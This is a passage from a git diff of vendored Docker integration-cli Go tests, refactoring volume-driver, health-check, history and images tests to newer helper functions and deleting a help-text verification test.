TestExternalVolumeDriverRetryNotImmediatelyE c.Fatal("volume creates fail when plugin not immediately available") } - _, err = s.d.Cmd("volume", "rm", "external-volume-test") + _, err := s.d.Cmd("volume", "rm", "external-volume-test") c.Assert(err, checker.IsNil) - c.Assert(s.ec.activations, checker.Equals, 1) - c.Assert(s.ec.creations, checker.Equals, 1) - c.Assert(s.ec.removals, checker.Equals, 1) - c.Assert(s.ec.mounts, checker.Equals, 1) - c.Assert(s.ec.unmounts, checker.Equals, 1) + c.Assert(p.ec.activations, checker.Equals, 1) + c.Assert(p.ec.creations, checker.Equals, 1) + c.Assert(p.ec.removals, checker.Equals, 1) + c.Assert(p.ec.mounts, checker.Equals, 1) + c.Assert(p.ec.unmounts, checker.Equals, 1) } func (s *DockerExternalVolumeSuite) TestExternalVolumeDriverBindExternalVolume(c *check.C) { @@ -501,12 +494,11 @@ func (s *DockerExternalVolumeSuite) TestExternalVolumeDriverGet(c *check.C) { func (s *DockerExternalVolumeSuite) TestExternalVolumeDriverWithDaemonRestart(c *check.C) { dockerCmd(c, "volume", "create", "-d", volumePluginName, "abc1") - err := s.d.Restart() - c.Assert(err, checker.IsNil) + s.d.Restart(c) dockerCmd(c, "run", "--name=test", "-v", "abc1:/foo", "busybox", "true") var mounts []types.MountPoint - inspectFieldAndMarshall(c, "test", "Mounts", &mounts) + inspectFieldAndUnmarshall(c, "test", "Mounts", &mounts) c.Assert(mounts, checker.HasLen, 1) c.Assert(mounts[0].Driver, checker.Equals, volumePluginName) } @@ -514,7 +506,7 @@ func (s *DockerExternalVolumeSuite) TestExternalVolumeDriverWithDaemonRestart(c // Ensures that the daemon handles when the plugin responds to a `Get` request with a null volume and a null error. // Prior the daemon would panic in this scenario. func (s *DockerExternalVolumeSuite) TestExternalVolumeDriverGetEmptyResponse(c *check.C) { - c.Assert(s.d.Start(), checker.IsNil) + s.d.Start(c) out, err := s.d.Cmd("volume", "create", "-d", volumePluginName, "abc2", "--opt", "ninja=1") c.Assert(err, checker.IsNil, check.Commentf(out)) @@ -525,27 +517,24 @@ func (s *DockerExternalVolumeSuite) TestExternalVolumeDriverGetEmptyResponse(c * } // Ensure only cached paths are used in volume list to prevent N+1 calls to `VolumeDriver.Path` +// +// TODO(@cpuguy83): This test is testing internal implementation. In all the cases here, there may not even be a path +// available because the volume is not even mounted. Consider removing this test. func (s *DockerExternalVolumeSuite) TestExternalVolumeDriverPathCalls(c *check.C) { - c.Assert(s.d.Start(), checker.IsNil) + s.d.Start(c) c.Assert(s.ec.paths, checker.Equals, 0) out, err := s.d.Cmd("volume", "create", "test", "--driver=test-external-volume-driver") c.Assert(err, checker.IsNil, check.Commentf(out)) - c.Assert(s.ec.paths, checker.Equals, 1) + c.Assert(s.ec.paths, checker.Equals, 0) out, err = s.d.Cmd("volume", "ls") c.Assert(err, checker.IsNil, check.Commentf(out)) - c.Assert(s.ec.paths, checker.Equals, 1) - - out, err = s.d.Cmd("volume", "inspect", "--format='{{.Mountpoint}}'", "test") - c.Assert(err, checker.IsNil, check.Commentf(out)) - c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") - c.Assert(s.ec.paths, checker.Equals, 1) + c.Assert(s.ec.paths, checker.Equals, 0) } func (s *DockerExternalVolumeSuite) TestExternalVolumeDriverMountID(c *check.C) { - err := s.d.StartWithBusybox() - c.Assert(err, checker.IsNil) + s.d.StartWithBusybox(c) out, err := s.d.Cmd("run", "--rm", "-v", "external-volume-test:/tmp/external-volume-test", "--volume-driver", volumePluginName, "busybox:latest", "cat", "/tmp/external-volume-test/test") c.Assert(err, checker.IsNil, check.Commentf(out)) @@ -554,7 +543,7 @@ func (s *DockerExternalVolumeSuite) TestExternalVolumeDriverMountID(c *check.C) // Check that VolumeDriver.Capabilities gets called, and only called once func (s *DockerExternalVolumeSuite) TestExternalVolumeDriverCapabilities(c *check.C) { - c.Assert(s.d.Start(), checker.IsNil) + s.d.Start(c) c.Assert(s.ec.caps, checker.Equals, 0) for i := 0; i < 3; i++ { @@ -572,14 +561,14 @@ func (s *DockerExternalVolumeSuite) TestExternalVolumeDriverOutOfBandDelete(c *c p := newVolumePlugin(c, driverName) defer p.Close() - c.Assert(s.d.StartWithBusybox(), checker.IsNil) + s.d.StartWithBusybox(c) out, err := s.d.Cmd("volume", "create", "-d", driverName, "--name", "test") c.Assert(err, checker.IsNil, check.Commentf(out)) out, err = s.d.Cmd("volume", "create", "-d", "local", "--name", "test") c.Assert(err, checker.NotNil, check.Commentf(out)) - c.Assert(out, checker.Contains, "volume named test already exists") + c.Assert(out, checker.Contains, "must be unique") // simulate out of band volume deletion on plugin level delete(p.vols, "test") @@ -617,7 +606,7 @@ func (s *DockerExternalVolumeSuite) TestExternalVolumeDriverOutOfBandDelete(c *c } func (s *DockerExternalVolumeSuite) TestExternalVolumeDriverUnmountOnMountFail(c *check.C) { - c.Assert(s.d.StartWithBusybox(), checker.IsNil) + s.d.StartWithBusybox(c) s.d.Cmd("volume", "create", "-d", "test-external-volume-driver", "--opt=invalidOption=1", "--name=testumount") out, _ := s.d.Cmd("run", "-v", "testumount:/foo", "busybox", "true") @@ -625,3 +614,18 @@ func (s *DockerExternalVolumeSuite) TestExternalVolumeDriverUnmountOnMountFail(c out, _ = s.d.Cmd("run", "-w", "/foo", "-v", "testumount:/foo", "busybox", "true") c.Assert(s.ec.unmounts, checker.Equals, 0, check.Commentf(out)) } + +func (s *DockerExternalVolumeSuite) TestExternalVolumeDriverUnmountOnCp(c *check.C) { + s.d.StartWithBusybox(c) + s.d.Cmd("volume", "create", "-d", "test-external-volume-driver", "--name=test") + + out, _ := s.d.Cmd("run", "-d", "--name=test", "-v", "test:/foo", "busybox", "/bin/sh", "-c", "touch /test && top") + c.Assert(s.ec.mounts, checker.Equals, 1, check.Commentf(out)) + + out, _ = s.d.Cmd("cp", "test:/test", "/tmp/test") + c.Assert(s.ec.mounts, checker.Equals, 2, check.Commentf(out)) + c.Assert(s.ec.unmounts, checker.Equals, 1, check.Commentf(out)) + + out, _ = s.d.Cmd("kill", "test") + c.Assert(s.ec.unmounts, checker.Equals, 2, check.Commentf(out)) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_health_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_health_test.go index 6b7baebd00..a06b6c8830 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_health_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_health_test.go @@ -2,32 +2,16 @@ package main import ( "encoding/json" - "strconv" "strings" "time" "github.com/docker/docker/api/types" - "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/integration-cli/checker" + "github.com/docker/docker/integration-cli/cli/build" "github.com/go-check/check" ) -func waitForStatus(c *check.C, name string, prev string, expected string) { - prev = prev + "\n" - expected = expected + "\n" - for { - out, _ := dockerCmd(c, "inspect", "--format={{.State.Status}}", name) - if out == expected { - return - } - c.Check(out, checker.Equals, prev) - if out != prev { - return - } - time.Sleep(100 * time.Millisecond) - } -} - func waitForHealthStatus(c *check.C, name string, prev string, expected string) { prev = prev + "\n" expected = expected + "\n" @@ -55,30 +39,26 @@ func getHealth(c *check.C, name string) *types.Health { func (s *DockerSuite) TestHealth(c *check.C) { testRequires(c, DaemonIsLinux) // busybox doesn't work on Windows + existingContainers := ExistingContainerIDs(c) + imageName := "testhealth" - _, err := buildImage(imageName, - `FROM busybox + buildImageSuccessfully(c, imageName, build.WithDockerfile(`FROM busybox RUN echo OK > /status CMD ["/bin/sleep", "120"] STOPSIGNAL SIGKILL HEALTHCHECK --interval=1s --timeout=30s \ - CMD cat /status`, - true) - - c.Check(err, check.IsNil) + CMD cat /status`)) // No health status before starting name := "test_health" - dockerCmd(c, "create", "--name", name, imageName) - out, _ := dockerCmd(c, "ps", "-a", "--format={{.Status}}") - c.Check(out, checker.Equals, "Created\n") + cid, _ := dockerCmd(c, "create", "--name", name, imageName) + out, _ := dockerCmd(c, "ps", "-a", "--format={{.ID}} {{.Status}}") + out = RemoveOutputForExistingElements(out, existingContainers) + c.Check(out, checker.Equals, cid[:12]+" Created\n") // Inspect the options out, _ = dockerCmd(c, "inspect", - "--format=timeout={{.Config.Healthcheck.Timeout}} "+ - "interval={{.Config.Healthcheck.Interval}} "+ - "retries={{.Config.Healthcheck.Retries}} "+ - "test={{.Config.Healthcheck.Test}}", name) + "--format=timeout={{.Config.Healthcheck.Timeout}} interval={{.Config.Healthcheck.Interval}} retries={{.Config.Healthcheck.Retries}} test={{.Config.Healthcheck.Test}}", name) c.Check(out, checker.Equals, "timeout=30s interval=1s retries=0 test=[CMD-SHELL cat /status]\n") // Start @@ -107,17 +87,15 @@ func (s *DockerSuite) TestHealth(c *check.C) { dockerCmd(c, "rm", "noh") // Disable the check with a new build - _, err = buildImage("no_healthcheck", - `FROM testhealth - HEALTHCHECK NONE`, true) - c.Check(err, check.IsNil) + buildImageSuccessfully(c, "no_healthcheck", build.WithDockerfile(`FROM testhealth + HEALTHCHECK NONE`)) - out, _ = dockerCmd(c, "inspect", "--format={{.ContainerConfig.Healthcheck.Test}}", "no_healthcheck") + out, _ = dockerCmd(c, "inspect", "--format={{.Config.Healthcheck.Test}}", "no_healthcheck") c.Check(out, checker.Equals, "[NONE]\n") // Enable the checks from the CLI _, _ = dockerCmd(c, "run", "-d", "--name=fatal_healthcheck", - "--health-interval=0.5s", + "--health-interval=1s", "--health-retries=3", "--health-cmd=cat /status", "no_healthcheck") @@ -143,27 +121,47 @@ func (s *DockerSuite) TestHealth(c *check.C) { // Note: if the interval is too small, it seems that Docker spends all its time running health // checks and never gets around to killing it. _, _ = dockerCmd(c, "run", "-d", "--name=test", - "--health-interval=1s", "--health-cmd=sleep 5m", "--health-timeout=1ms", imageName) + "--health-interval=1s", "--health-cmd=sleep 5m", "--health-timeout=1s", imageName) waitForHealthStatus(c, "test", "starting", "unhealthy") health = getHealth(c, "test") last = health.Log[len(health.Log)-1] c.Check(health.Status, checker.Equals, "unhealthy") c.Check(last.ExitCode, checker.Equals, -1) - c.Check(last.Output, checker.Equals, "Health check exceeded timeout (1ms)") + c.Check(last.Output, checker.Equals, "Health check exceeded timeout (1s)") dockerCmd(c, "rm", "-f", "test") // Check JSON-format - _, err = buildImage(imageName, - `FROM busybox + buildImageSuccessfully(c, imageName, build.WithDockerfile(`FROM busybox RUN echo OK > /status CMD ["/bin/sleep", "120"] STOPSIGNAL SIGKILL HEALTHCHECK --interval=1s --timeout=30s \ - CMD ["cat", "/my status"]`, - true) - c.Check(err, check.IsNil) + CMD ["cat", "/my status"]`)) out, _ = dockerCmd(c, "inspect", "--format={{.Config.Healthcheck.Test}}", imageName) c.Check(out, checker.Equals, "[CMD cat /my status]\n") } + +// GitHub #33021 +func (s *DockerSuite) TestUnsetEnvVarHealthCheck(c *check.C) { + testRequires(c, DaemonIsLinux) // busybox doesn't work on Windows + + imageName := "testhealth" + buildImageSuccessfully(c, imageName, build.WithDockerfile(`FROM busybox +HEALTHCHECK --interval=1s --timeout=5s --retries=5 CMD /bin/sh -c "sleep 1" +ENTRYPOINT /bin/sh -c "sleep 600"`)) + + name := "env_test_health" + // No health status before starting + dockerCmd(c, "run", "-d", "--name", name, "-e", "FOO", imageName) + defer func() { + dockerCmd(c, "rm", "-f", name) + dockerCmd(c, "rmi", imageName) + }() + + // Start + dockerCmd(c, "start", name) + waitForHealthStatus(c, name, "starting", "healthy") + +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_help_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_help_test.go deleted file mode 100644 index 29b6553fc5..0000000000 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_help_test.go +++ /dev/null @@ -1,321 +0,0 @@ -package main - -import ( - "fmt" - "os/exec" - "runtime" - "strings" - "unicode" - - "github.com/docker/docker/pkg/homedir" - "github.com/docker/docker/pkg/integration/checker" - icmd "github.com/docker/docker/pkg/integration/cmd" - "github.com/go-check/check" -) - -func (s *DockerSuite) TestHelpTextVerify(c *check.C) { - testRequires(c, DaemonIsLinux) - - // Make sure main help text fits within 80 chars and that - // on non-windows system we use ~ when possible (to shorten things). - // Test for HOME set to its default value and set to "/" on linux - // Yes on windows setting up an array and looping (right now) isn't - // necessary because we just have one value, but we'll need the - // array/loop on linux so we might as well set it up so that we can - // test any number of home dirs later on and all we need to do is - // modify the array - the rest of the testing infrastructure should work - homes := []string{homedir.Get()} - - // Non-Windows machines need to test for this special case of $HOME - if runtime.GOOS != "windows" { - homes = append(homes, "/") - } - - homeKey := homedir.Key() - baseEnvs := appendBaseEnv(true) - - // Remove HOME env var from list so we can add a new value later. - for i, env := range baseEnvs { - if strings.HasPrefix(env, homeKey+"=") { - baseEnvs = append(baseEnvs[:i], baseEnvs[i+1:]...) - break - } - } - - for _, home := range homes { - - // Dup baseEnvs and add our new HOME value - newEnvs := make([]string, len(baseEnvs)+1) - copy(newEnvs, baseEnvs) - newEnvs[len(newEnvs)-1] = homeKey + "=" + home - - scanForHome := runtime.GOOS != "windows" && home != "/" - - // Check main help text to make sure its not over 80 chars - helpCmd := exec.Command(dockerBinary, "help") - helpCmd.Env = newEnvs - out, _, err := runCommandWithOutput(helpCmd) - c.Assert(err, checker.IsNil, check.Commentf(out)) - lines := strings.Split(out, "\n") - for _, line := range lines { - // All lines should not end with a space - c.Assert(line, checker.Not(checker.HasSuffix), " ", check.Commentf("Line should not end with a space")) - - if scanForHome && strings.Contains(line, `=`+home) { - c.Fatalf("Line should use '%q' instead of %q:\n%s", homedir.GetShortcutString(), home, line) - } - if runtime.GOOS != "windows" { - i := strings.Index(line, homedir.GetShortcutString()) - if i >= 0 && i != len(line)-1 && line[i+1] != '/' { - c.Fatalf("Main help should not have used home shortcut:\n%s", line) - } - } - } - - // Make sure each cmd's help text fits within 90 chars and that - // on non-windows system we use ~ when possible (to shorten things). - // Pull the list of commands from the "Commands:" section of docker help - helpCmd = exec.Command(dockerBinary, "help") - helpCmd.Env = newEnvs - out, _, err = runCommandWithOutput(helpCmd) - c.Assert(err, checker.IsNil, check.Commentf(out)) - i := strings.Index(out, "Commands:") - c.Assert(i, checker.GreaterOrEqualThan, 0, check.Commentf("Missing 'Commands:' in:\n%s", out)) - - cmds := []string{} - // Grab all chars starting at "Commands:" - helpOut := strings.Split(out[i:], "\n") - // Skip first line, it is just "Commands:" - helpOut = helpOut[1:] - - // Create the list of commands we want to test - cmdsToTest := []string{} - for _, cmd := range helpOut { - // Stop on blank line or non-idented line - if cmd == "" || !unicode.IsSpace(rune(cmd[0])) { - break - } - - // Grab just the first word of each line - cmd = strings.Split(strings.TrimSpace(cmd), " ")[0] - cmds = append(cmds, cmd) // Saving count for later - - cmdsToTest = append(cmdsToTest, cmd) - } - - // Add some 'two word' commands - would be nice to automatically - // calculate this list - somehow - cmdsToTest = append(cmdsToTest, "volume create") - cmdsToTest = append(cmdsToTest, "volume inspect") - cmdsToTest = append(cmdsToTest, "volume ls") - cmdsToTest = append(cmdsToTest, "volume rm") - cmdsToTest = append(cmdsToTest, "network connect") - cmdsToTest = append(cmdsToTest, "network create") - cmdsToTest = append(cmdsToTest, "network disconnect") - cmdsToTest = append(cmdsToTest, "network inspect") - cmdsToTest = append(cmdsToTest, "network ls") - cmdsToTest = append(cmdsToTest, "network rm") - - if experimentalDaemon { - cmdsToTest = append(cmdsToTest, "checkpoint create") - cmdsToTest = append(cmdsToTest, "checkpoint ls") - cmdsToTest = append(cmdsToTest, "checkpoint rm") - } - - // Divide the list of commands into go routines and run the func testcommand on the commands in parallel - // to save runtime of test - - errChan := make(chan error) - - for index := 0; index < len(cmdsToTest); index++ { - go func(index int) { - errChan <- testCommand(cmdsToTest[index], newEnvs, scanForHome, home) - }(index) - } - - for index := 0; index < len(cmdsToTest); index++ { - err := <-errChan - if err != nil { - c.Fatal(err) - } - } - } -} - -func (s *DockerSuite) TestHelpExitCodesHelpOutput(c *check.C) { - // Test to make sure the exit code and output (stdout vs stderr) of - // various good and bad cases are what we expect - - // docker : stdout=all, stderr=empty, rc=0 - out, _, err := dockerCmdWithError() - c.Assert(err, checker.IsNil, check.Commentf(out)) - // Be really pick - c.Assert(out, checker.Not(checker.HasSuffix), "\n\n", check.Commentf("Should not have a blank line at the end of 'docker'\n")) - - // docker help: stdout=all, stderr=empty, rc=0 - out, _, err = dockerCmdWithError("help") - c.Assert(err, checker.IsNil, check.Commentf(out)) - // Be really pick - c.Assert(out, checker.Not(checker.HasSuffix), "\n\n", check.Commentf("Should not have a blank line at the end of 'docker help'\n")) - - // docker --help: stdout=all, stderr=empty, rc=0 - out, _, err = dockerCmdWithError("--help") - c.Assert(err, checker.IsNil, check.Commentf(out)) - // Be really pick - c.Assert(out, checker.Not(checker.HasSuffix), "\n\n", check.Commentf("Should not have a blank line at the end of 'docker --help'\n")) - - // docker inspect busybox: stdout=all, stderr=empty, rc=0 - // Just making sure stderr is empty on valid cmd - out, _, err = dockerCmdWithError("inspect", "busybox") - c.Assert(err, checker.IsNil, check.Commentf(out)) - // Be really pick - c.Assert(out, checker.Not(checker.HasSuffix), "\n\n", check.Commentf("Should not have a blank line at the end of 'docker inspect busyBox'\n")) - - // docker rm: stdout=empty, stderr=all, rc!=0 - // testing the min arg error msg - cmd := exec.Command(dockerBinary, "rm") - stdout, stderr, _, err := runCommandWithStdoutStderr(cmd) - c.Assert(err, checker.NotNil) - c.Assert(stdout, checker.Equals, "") - // Should not contain full help text but should contain info about - // # of args and Usage line - c.Assert(stderr, checker.Contains, "requires at least 1 argument", check.Commentf("Missing # of args text from 'docker rm'\n")) - - // docker rm NoSuchContainer: stdout=empty, stderr=all, rc=0 - // testing to make sure no blank line on error - cmd = exec.Command(dockerBinary, "rm", "NoSuchContainer") - stdout, stderr, _, err = runCommandWithStdoutStderr(cmd) - c.Assert(err, checker.NotNil) - c.Assert(len(stderr), checker.Not(checker.Equals), 0) - c.Assert(stdout, checker.Equals, "") - // Be really picky - c.Assert(stderr, checker.Not(checker.HasSuffix), "\n\n", check.Commentf("Should not have a blank line at the end of 'docker rm'\n")) - - // docker BadCmd: stdout=empty, stderr=all, rc=0 - cmd = exec.Command(dockerBinary, "BadCmd") - stdout, stderr, _, err = runCommandWithStdoutStderr(cmd) - c.Assert(err, checker.NotNil) - c.Assert(stdout, checker.Equals, "") - c.Assert(stderr, checker.Equals, "docker: 'BadCmd' is not a docker command.\nSee 'docker --help'\n", check.Commentf("Unexcepted output for 'docker badCmd'\n")) -} - -func testCommand(cmd string, newEnvs []string, scanForHome bool, home string) error { - - args := strings.Split(cmd+" --help", " ") - - // Check the full usage text - helpCmd := exec.Command(dockerBinary, args...) - helpCmd.Env = newEnvs - out, stderr, _, err := runCommandWithStdoutStderr(helpCmd) - if len(stderr) != 0 { - return fmt.Errorf("Error on %q help. non-empty stderr:%q\n", cmd, stderr) - } - if strings.HasSuffix(out, "\n\n") { - return fmt.Errorf("Should not have blank line on %q\n", cmd) - } - if !strings.Contains(out, "--help") { - return fmt.Errorf("All commands should mention '--help'. Command '%v' did not.\n", cmd) - } - - if err != nil { - return fmt.Errorf(out) - } - - // Check each line for lots of stuff - lines := strings.Split(out, "\n") - for _, line := range lines { - i := strings.Index(line, "~") - if i >= 0 && i != len(line)-1 && line[i+1] != '/' { - return fmt.Errorf("Help for %q should not have used ~:\n%s", cmd, line) - } - - // If a line starts with 4 spaces then assume someone - // added a multi-line description for an option and we need - // to flag it - if strings.HasPrefix(line, " ") && - !strings.HasPrefix(strings.TrimLeft(line, " "), "--") { - return fmt.Errorf("Help for %q should not have a multi-line option", cmd) - } - - // Options should NOT end with a period - if strings.HasPrefix(line, " -") && strings.HasSuffix(line, ".") { - return fmt.Errorf("Help for %q should not end with a period: %s", cmd, line) - } - - // Options should NOT end with a space - if strings.HasSuffix(line, " ") { - return fmt.Errorf("Help for %q should not end with a space: %s", cmd, line) - } - - } - - // For each command make sure we generate an error - // if we give a bad arg - args = strings.Split(cmd+" --badArg", " ") - - out, _, err = dockerCmdWithError(args...) - if err == nil { - return fmt.Errorf(out) - } - - // Be really picky - if strings.HasSuffix(stderr, "\n\n") { - return fmt.Errorf("Should not have a blank line at the end of 'docker rm'\n") - } - - // Now make sure that each command will print a short-usage - // (not a full usage - meaning no opts section) if we - // are missing a required arg or pass in a bad arg - - // These commands will never print a short-usage so don't test - noShortUsage := map[string]string{ - "images": "", - "login": "", - "logout": "", - "network": "", - "stats": "", - "volume create": "", - } - - if _, ok := noShortUsage[cmd]; !ok { - // skipNoArgs are ones that we don't want to try w/o - // any args. Either because it'll hang the test or - // lead to incorrect test result (like false negative). - // Whatever the reason, skip trying to run w/o args and - // jump to trying with a bogus arg. - skipNoArgs := map[string]struct{}{ - "daemon": {}, - "events": {}, - "load": {}, - } - - var result *icmd.Result - if _, ok := skipNoArgs[cmd]; !ok { - result = dockerCmdWithResult(strings.Split(cmd, " ")...) - } - - // If its ok w/o any args then try again with an arg - if result == nil || result.ExitCode == 0 { - result = dockerCmdWithResult(strings.Split(cmd+" badArg", " ")...) - } - - if err := result.Compare(icmd.Expected{ - Out: icmd.None, - Err: "\nUsage:", - ExitCode: 1, - }); err != nil { - return err - } - - stderr := result.Stderr() - // Shouldn't have full usage - if strings.Contains(stderr, "--help=false") { - return fmt.Errorf("Should not have full usage on %q:%v", result.Cmd.Args, stderr) - } - if strings.HasSuffix(stderr, "\n\n") { - return fmt.Errorf("Should not have a blank line on %q\n%v", result.Cmd.Args, stderr) - } - } - - return nil -} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_history_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_history_test.go index 9979080b1c..43c4b94334 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_history_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_history_test.go @@ -6,7 +6,8 @@ import ( "strconv" "strings" - "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/integration-cli/checker" + "github.com/docker/docker/integration-cli/cli/build" "github.com/go-check/check" ) @@ -14,7 +15,7 @@ import ( // sort is not predictable it doesn't always fail. func (s *DockerSuite) TestBuildHistory(c *check.C) { name := "testbuildhistory" - _, err := buildImage(name, `FROM `+minimalBaseImage()+` + buildImageSuccessfully(c, name, build.WithDockerfile(`FROM `+minimalBaseImage()+` LABEL label.A="A" LABEL label.B="B" LABEL label.C="C" @@ -40,12 +41,9 @@ LABEL label.V="V" LABEL label.W="W" LABEL label.X="X" LABEL label.Y="Y" -LABEL label.Z="Z"`, - true) +LABEL label.Z="Z"`)) - c.Assert(err, checker.IsNil) - - out, _ := dockerCmd(c, "history", "testbuildhistory") + out, _ := dockerCmd(c, "history", name) actualValues := strings.Split(out, "\n")[1:27] expectedValues := [26]string{"Z", "Y", "X", "W", "V", "U", "T", "S", "R", "Q", "P", "O", "N", "M", "L", "K", "J", "I", "H", "G", "F", "E", "D", "C", "B", "A"} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_images_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_images_test.go index 3b678a2586..0dd319fbc9 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_images_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_images_test.go @@ -10,9 +10,11 @@ import ( "strings" "time" - "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/integration-cli/checker" + "github.com/docker/docker/integration-cli/cli/build" "github.com/docker/docker/pkg/stringid" "github.com/go-check/check" + "gotest.tools/icmd" ) func (s *DockerSuite) TestImagesEnsureImageIsListed(c *check.C) { @@ -45,20 +47,17 @@ func (s *DockerSuite) TestImagesEnsureImageWithBadTagIsNotListed(c *check.C) { } func (s *DockerSuite) TestImagesOrderedByCreationDate(c *check.C) { - id1, err := buildImage("order:test_a", - `FROM busybox - MAINTAINER dockerio1`, true) - c.Assert(err, checker.IsNil) + buildImageSuccessfully(c, "order:test_a", build.WithDockerfile(`FROM busybox + MAINTAINER dockerio1`)) + id1 := getIDByName(c, "order:test_a") time.Sleep(1 * time.Second) - id2, err := buildImage("order:test_c", - `FROM busybox - MAINTAINER dockerio2`, true) - c.Assert(err, checker.IsNil) + buildImageSuccessfully(c, "order:test_c", build.WithDockerfile(`FROM busybox + MAINTAINER dockerio2`)) + id2 := getIDByName(c, "order:test_c") time.Sleep(1 * time.Second) - id3, err := buildImage("order:test_b", - `FROM busybox - MAINTAINER dockerio3`, true) - c.Assert(err, checker.IsNil) + buildImageSuccessfully(c, "order:test_b", build.WithDockerfile(`FROM busybox + MAINTAINER dockerio3`)) + id3 := getIDByName(c, "order:test_b") out, _ := dockerCmd(c, "images", "-q", "--no-trunc") imgs := strings.Split(out, "\n") @@ -77,20 +76,17 @@ func (s *DockerSuite) TestImagesFilterLabelMatch(c *check.C) { imageName1 := "images_filter_test1" imageName2 := "images_filter_test2" imageName3 := "images_filter_test3" - image1ID, err := buildImage(imageName1, - `FROM busybox - LABEL match me`, true) - c.Assert(err, check.IsNil) + buildImageSuccessfully(c, imageName1, build.WithDockerfile(`FROM busybox + LABEL match me`)) + image1ID := getIDByName(c, imageName1) - image2ID, err := buildImage(imageName2, - `FROM busybox - LABEL match="me too"`, true) - c.Assert(err, check.IsNil) + buildImageSuccessfully(c, imageName2, build.WithDockerfile(`FROM busybox + LABEL match="me too"`)) + image2ID := getIDByName(c, imageName2) - image3ID, err := buildImage(imageName3, - `FROM busybox - LABEL nomatch me`, true) - c.Assert(err, check.IsNil) + buildImageSuccessfully(c, imageName3, build.WithDockerfile(`FROM busybox + LABEL nomatch me`)) + image3ID := getIDByName(c, imageName3) out, _ := dockerCmd(c, "images", "--no-trunc", "-q", "-f", "label=match") out = strings.TrimSpace(out) @@ -104,7 +100,7 @@ func (s *DockerSuite) TestImagesFilterLabelMatch(c *check.C) { } // Regression : #15659 -func (s *DockerSuite) TestImagesFilterLabelWithCommit(c *check.C) { +func (s *DockerSuite) TestCommitWithFilterLabel(c *check.C) { // Create a container dockerCmd(c, "run", "--name", "bar", "busybox", "/bin/sh") // Commit with labels "using changes" @@ -117,15 +113,15 @@ func (s *DockerSuite) TestImagesFilterLabelWithCommit(c *check.C) { } func (s *DockerSuite) TestImagesFilterSinceAndBefore(c *check.C) { - imageID1, err := buildImage("image:1", `FROM `+minimalBaseImage()+` -LABEL number=1`, true) - c.Assert(err, checker.IsNil) - imageID2, err := buildImage("image:2", `FROM `+minimalBaseImage()+` -LABEL number=2`, true) - c.Assert(err, checker.IsNil) - imageID3, err := buildImage("image:3", `FROM `+minimalBaseImage()+` -LABEL number=3`, true) - c.Assert(err, checker.IsNil) + buildImageSuccessfully(c, "image:1", build.WithDockerfile(`FROM `+minimalBaseImage()+` +LABEL number=1`)) + imageID1 := getIDByName(c, "image:1") + buildImageSuccessfully(c, "image:2", build.WithDockerfile(`FROM `+minimalBaseImage()+` +LABEL number=2`)) + imageID2 := getIDByName(c, "image:2") + buildImageSuccessfully(c, "image:3", build.WithDockerfile(`FROM `+minimalBaseImage()+` +LABEL number=3`)) + imageID3 := getIDByName(c, "image:3") expected := []string{imageID3, imageID2} @@ -185,13 +181,16 @@ func assertImageList(out string, expected []string) bool { return true } +// FIXME(vdemeester) should be a unit test on `docker image ls` func (s *DockerSuite) TestImagesFilterSpaceTrimCase(c *check.C) { imageName := "images_filter_test" - buildImage(imageName, - `FROM busybox + // Build a image and fail to build so that we have dangling images ? + buildImage(imageName, build.WithDockerfile(`FROM busybox RUN touch /test/foo RUN touch /test/bar - RUN touch /test/baz`, true) + RUN touch /test/baz`)).Assert(c, icmd.Expected{ + ExitCode: 1, + }) filters := []string{ "dangling=true", @@ -250,6 +249,7 @@ func (s *DockerSuite) TestImagesEnsureDanglingImageOnlyListedOnce(c *check.C) { } +// FIXME(vdemeester) should be a unit test for `docker image ls` func (s *DockerSuite) TestImagesWithIncorrectFilter(c *check.C) { out, _, err := dockerCmdWithError("images", "-f", "dangling=invalid") c.Assert(err, check.NotNil) @@ -261,32 +261,33 @@ func (s *DockerSuite) TestImagesEnsureOnlyHeadsImagesShown(c *check.C) { FROM busybox MAINTAINER docker ENV foo bar` - - head, out, err := buildImageWithOut("scratch-image", dockerfile, false) - c.Assert(err, check.IsNil) + name := "scratch-image" + result := buildImage(name, build.WithDockerfile(dockerfile)) + result.Assert(c, icmd.Success) + id := getIDByName(c, name) // this is just the output of docker build // we're interested in getting the image id of the MAINTAINER instruction // and that's located at output, line 5, from 7 to end - split := strings.Split(out, "\n") + split := strings.Split(result.Combined(), "\n") intermediate := strings.TrimSpace(split[5][7:]) - out, _ = dockerCmd(c, "images") + out, _ := dockerCmd(c, "images") // images shouldn't show non-heads images c.Assert(out, checker.Not(checker.Contains), intermediate) // images should contain final built images - c.Assert(out, checker.Contains, stringid.TruncateID(head)) + c.Assert(out, checker.Contains, stringid.TruncateID(id)) } func (s *DockerSuite) TestImagesEnsureImagesFromScratchShown(c *check.C) { testRequires(c, DaemonIsLinux) // Windows does not support FROM scratch - dockerfile := ` FROM scratch MAINTAINER docker` - id, _, err := buildImageWithOut("scratch-image", dockerfile, false) - c.Assert(err, check.IsNil) + name := "scratch-image" + buildImageSuccessfully(c, name, build.WithDockerfile(dockerfile)) + id := getIDByName(c, name) out, _ := dockerCmd(c, "images") // images should contain images built from scratch @@ -299,9 +300,10 @@ func (s *DockerSuite) TestImagesEnsureImagesFromBusyboxShown(c *check.C) { dockerfile := ` FROM busybox MAINTAINER docker` + name := "busybox-image" - id, _, err := buildImageWithOut("busybox-image", dockerfile, false) - c.Assert(err, check.IsNil) + buildImageSuccessfully(c, name, build.WithDockerfile(dockerfile)) + id := getIDByName(c, name) out, _ := dockerCmd(c, "images") // images should contain images built from busybox @@ -334,7 +336,7 